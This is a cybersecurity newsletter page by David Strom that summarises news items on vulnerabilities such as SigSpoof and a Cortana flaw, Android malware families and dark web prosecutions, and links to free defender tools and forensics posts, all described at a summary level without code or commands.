Inside Security | Inside

[ Inside Security ]

David Strom's in-depth cybersecurity news and analysis

I have been following the evolution of digital Estonia for several years and signed up as an eResident last year. In this week’s podcast for Security Ledger, Paul Roberts interviews Taavi Kotka and his four years as the CIO for Estonia. Kotka talks about his accomplishments, including putting various government services online such as voting. Two things you can’t do digitally in Estonia: get married and divorced. (Denmark has had digital divorces for some time, although they are making it somewhat more difficult next year.) Worth a listen.

-- David Strom, editor of Inside Security

1.  Another decades-old flaw has been found in several PGP-related clients. Called SigSpoof, it allows hackers to spoof a digital signature and was discovered last week by a researcher. The flaw is present only when using the setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default. – ARS  

2. There is new research (the link will take you to a sceencast demonstration) about a vulnerability with Google Home or Chromecast devices. It shows that Web sites can run a simple script in the background that collects precise location data on people who have these installed anywhere on their local network. The attack works by asking the Google device for a list of nearby wireless networks and then sending that list to Google’s geolocation lookup services. Google is working on a fix, after initially refusing to acknowledge the researcher’s report. – KREBS ON SECURITY

Subscribe to Inside Security

Many thanks to Inside Security's corporate supporters.  Please go check them out!


Endgame's endpoint security platform protects the world’s largest organizations from targeted attacks, eliminating the time & cost associated with incident response. Learn more


Nok Nok Labs has the ambition to transform authentication, by unifying it into one standard protocol, giving business the control they need. Learn more


I have put together my top ten recent stories (in order from my most to least favorite) about various tools that defenders can use to protect their networks and endpoints. All of the tools mentioned here are free or minimal cost. Some of these posts are a sequence of articles, so there is a lot to review and learn from here. Don’t worry, there are plenty of exploits to cover and I will do so in tomorrow’s newsletter.

-- David Strom, Editor of Inside Security

Here are an excellent series of posts from Varonis on various ways to detect hidden malware. The author calls it Living off the Land, in which hackers reuse less well-known Windows utilities to hide script payloads and cloak other activities. It now has three articles: First is an intro to Regsvr32, which allows for JScript or VBScript to be injected into DLLs. Part 2 covers MS HTA, which began life many years ago as a useful development tool that allowed IT people to leverage HTML and JavaScript or VBScript to create webby apps. Now it still lies in the Windows/System32 folder and hackers have been taking advantage of it. Part 3 covers Certutil, another Windows utility that is used to display CA info but also can be exploited.

2. Here is a collection of tools that can be used to understand the internal workings of .NET, such as PerfView and SharpView. While not strictly security tools, they can all help you debug your code and find vulnerabilities. – MATT WARREN BLOG

3.  Microsoft has patched a major vulnerability in Windows 10 that could allow anyone to break into your computer just by issuing voice commands to Cortana. Here are the published technical details of the flaw, along with a step-by-step proof-of-concept video tutorial. Before the patch, you could also use Cortana to obtain confidential data on a PC. Time to update!

4. Gal Vallerius, a 36-year-old French national pleaded guilty this week in the U.S. of selling narcotics on the Dark Web under the nickname of OxyMonster. US authorities arrested Vallerius at the Atlanta airport in September after he arrived in the U.S. to attend and participate in the World Beard and Mustache Championships.  He was found by authorities tracing a Bitcoin-based “tip jar” he used, and his laptop connected him with his crimes. Other dark web criminals use some sort of anonymizing service to hide their identities. Vallerius could face 20 years behind bars.– BLEEPING COMPUTER

5. And in other legal actions, a Belgian man was found guilty of a 16-month campaign of harassment against an author who’s known for campaigning against racism. The man’s identity wasn’t released but between January 2015 and April 2016 the author was attacked on Twitter several times by the same account, @Kafirbrigade. Twitter provided law enforcement with his IP address. My colleague Lisa Vaas tells the story. – NAKED SECURITY (SOPHOS)

6.Here is an informative post that reviews a very subtle AWS privilege escalation method and what you can do to protect yourself against it. It starts with creating new policies that can be tweaked. It isn’t a simple process. Rhino has written an open source program called aws_esclate that you can download here to scan your VMs for exploits. – RHINO SECURITY BLOG

7. Two new Android malware families have been discovered. First is MysteryBot. It packs a banking trojan, keylogger, and ransomware into a single package. It operates on both Android v7 and v8 devices by using a reliable way to time its overlay screens and show them when the user opens and brings an app into the foreground. ThreatFabric researchers say MysteryBot appears to be related to the well-known and highly popular LokiBot trojan. -- FOSSBYTES

Second is HeroRat. It leverages Telegram messaging. It has been spreading since at least August 2017. In March 2018, its source code was made available for free on Telegram hacking channels, and as a result, hundreds of parallel variants of the malware have been circulating in the wild. Attackers lure victims into downloading the RAT by spreading it under various attractive-sounding guises, via third-party app stores, social media and messaging apps. – WE LIVE SECURITY (ESET)

8.  Joshua Adam Schulte once created malware for both the CIA and NSA to break into adversaries' computers. He was indicted Monday by the Department of Justice on 13 charges of allegedly stealing and transmitting thousands of classified materials. The claim is that he was the mastermind behind the Vault 7 leaks. Schulte had been charged last year in New York with possession of child pornography. -- NYTIMES

9. If you have heard about a Chrome security extension from the startup Paladin, move on. Turns out they are selling snake oil, and the extension is close to worthless. This report goes into why and how the devil is in the technical details. -- ZDNET

10. Researchers employing machine learning algorithms have discovered an enormous certificate signing abuse by BrowseFox, a marketing adware plugin that illicitly injects pop-up ads and discount deals. The plugin may be exploited by threat actors by corrupting ads to lead victims to malicious sites and unknowingly download malware. This post takes you through the details of how it works.– TREND MICRO BLOG

Why not try to figure out a career that can encompass all three at the same time?  -- FACEBOOK

3. Here are some tips on how to improve your web app security from a developer’s perspective. While many developers claim that security can make apps harder to use and to test, that isn’t the case. The author suggests starting from a position of understanding how much effort is going into stopping an intruder and then drawing an appropriate line in the sand, or the code, as the case may be. – DZONE

4. Only half of devops teams integrate application security testing elements in their workflows, according to a new survey. Respondents cited a lack of automated security testing tools, lots of false positives to track down, and other excuses. The post talks about how IT can approach secure devops and invest in more and better security practices. – SECURITY INTELLIGENCE BLOG (IBM)

5. If you were a fan of the Renesys-based Internet Intelligence Map, Oracle has purchased its assets and will continue the practice. You can read my 2014 review of the service in Network World here. The map offers data about ISP outages around the world, showing where potential trouble spots are happening. It has two sections: Country Statistics and Traffic Shifts. – ORACLE BLOG

6.  Here is another series of posts about understanding malicious PowerShell scripting techniques that are often used by hackers. The first blog post walked through how to find malicious PowerShell scripts in the System event log, and the various steps to decode them. The second post discusses how the Windows Registry can be another location where malicious PowerShell scripts might be hiding. Both are from Mari DeGrazia’s Another Forensics blog.

7. Bro is extremely powerful network traffic analyzer because it captures network metadata and provides a scriptable programming language that can be used to interpret behavioral networks signs of interest. It is available via open source, too. This blog post describes its many uses, and you can download the code here. It was originally developed by Vern Paxson and has academic researchers in Berkeley and Urbana that contribute to its code.

load more stories